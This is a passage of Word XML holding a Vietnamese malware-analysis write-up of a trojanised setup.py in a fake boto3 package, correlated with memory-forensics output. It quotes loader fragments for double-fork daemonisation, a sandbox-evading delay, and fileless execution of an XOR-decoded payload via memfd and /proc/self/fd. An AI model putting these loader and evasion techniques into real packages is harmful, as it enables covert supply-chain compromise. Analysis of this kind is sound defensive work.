        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8BDB55" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Tách tiến trình khỏi terminal bằng kỹ thuật double-fork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A209F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Sau khi tải payload, chương trình thực hiện lần fork thứ nhất:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C725E4E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">fork1 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>os.fork</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A98E1C7" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="661A6A7B" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>0 !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>= fork1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73CCB3" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>os._exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B80A49A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Tiến trình cha thoát, còn tiến trình con tiếp tục chạy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71377CE9" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Sau đó chương trình tạo session mới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BFF618" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>os.chdir</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>("/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7750F5DE" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>os.setsid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F54F4A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>os.umask</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EFBDA6" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Tiếp tục fork lần thứ hai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B5535" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">fork2 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>os.fork</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2510AC2B" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="0BA9C644" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>0 !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>= fork2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B27CD9D" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107A846" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Đây là kỹ thuật double-fork daemonization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF4DA8" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t>Mục đích:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E32A21" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t>Tách process khỏi terminal SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D416D1" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t>Chạy ngầm dưới nền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387C402B" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t>Làm process bị re-parent về PID 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B68F36" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t>Tránh bị kết thúc khi phiên shell ban đầu đóng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A0B913" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Điều này khớp với kết quả linux_pstree, khi PID 1451 nằm trực tiếp dưới systemd thay vì nằm dưới Bash PID 1420.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E8D90E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:pict w14:anchorId="6EC132FE">
          <v:rect id="_x0000_i1102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBCF0A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Trì hoãn trước khi thực thi payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA2B47D" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>run(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>) bắt đầu bằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F2CAA5" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>def run(fd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54EE5D" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B493821" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Payload chờ 10 giây trước khi thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB3BBB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Khoảng trì hoãn này có thể nhằm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F446F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t>Tránh các sandbox chỉ theo dõi trong thời gian ngắn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F612572" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t>Cho tiến trình cha kết thúc hoàn toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE67F6C" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t>Làm quá trình cài package nhìn giống đã hoàn tất hoặc bị dừng bình thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B33990" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:pict w14:anchorId="04CE2A85">
          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B40F4C" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Thực thi payload trực tiếp từ file descriptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBBA31C" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Sau thời gian chờ, chương trình thực thi anonymous file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D5479" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>os.execl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E5DA1" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    f"/proc/self/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>fd/{fd}"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746AC1C0" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    "sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E97E1E7" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C23E32" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Đường dẫn thực thi có dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD8F7DB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>/proc/self/fd/4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A9516A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t>os.execl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>() thay thế hoàn toàn process Python hiện tại bằng payload ELF nằm trong memfd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A54CF0" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Chuỗi thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21856FBA" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>python3 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171BF290" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26353670" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>download encrypted payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62761C09" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E6BB2" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>XOR 0xEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7216711D" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FE637D" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve"> to memfd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773B9949" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44746E6B" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>exec /proc/self/fd/4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BCE419" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Đây là lý do payload không tồn tại như một file bình thường trên filesystem nhưng vẫn có thể được thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B1F128" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Giải thích file descriptor 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D45FA" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Chương trình thường sử dụng các file descriptor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F2555F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>FD 0: stdin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1F746" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>FD 1: stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A38297F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>FD 2: stderr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179CCAA6" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Sau đó socket được tạo trước:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75171027" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">client = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D39DCF" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Socket thường nhận FD 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2159C892" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Tiếp theo memfd_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>create(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>) được gọi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C704FA0" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">fd = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>ctypes.CDLL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(None</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>).syscall</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(319, "", 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB64A5" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Memfd tiếp theo thường nhận FD 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0940FEA3" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Sau khi tải payload, socket bị đóng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D756DE3" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>client.close</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D05598F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t>Do đó kết quả linux_lsof chỉ còn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1149905A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>3  PID</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>1451  FD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>4  /:[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>22758]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E339886" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Điều này chứng minh FD 4 chính là anonymous memfd chứa stage 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F1FA0" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:pict w14:anchorId="1F622DB2">
          <v:rect id="_x0000_i1132" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A382D73" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683477FB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>File setup.py là một supply-chain loader được chèn mã độc vào package boto3 giả mạo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEBC4E8" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Chuỗi hành vi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EDC143" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Clone repository giả mạo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061BFE09" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED58D0" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Chạy python3 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E751094" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
